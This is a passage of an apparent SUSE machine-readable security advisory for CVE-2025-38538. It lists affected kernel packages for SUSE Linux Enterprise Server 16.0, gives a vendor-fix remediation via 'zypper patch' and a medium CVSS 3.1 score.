],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38538",
"url": "https://www.suse.com/security/cve/CVE-2025-38538"
},
{
"category": "external",
"summary": "SUSE Bug 1248213 for CVE-2025-38538",
"url": "https://bugzilla.suse.com/1248213"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
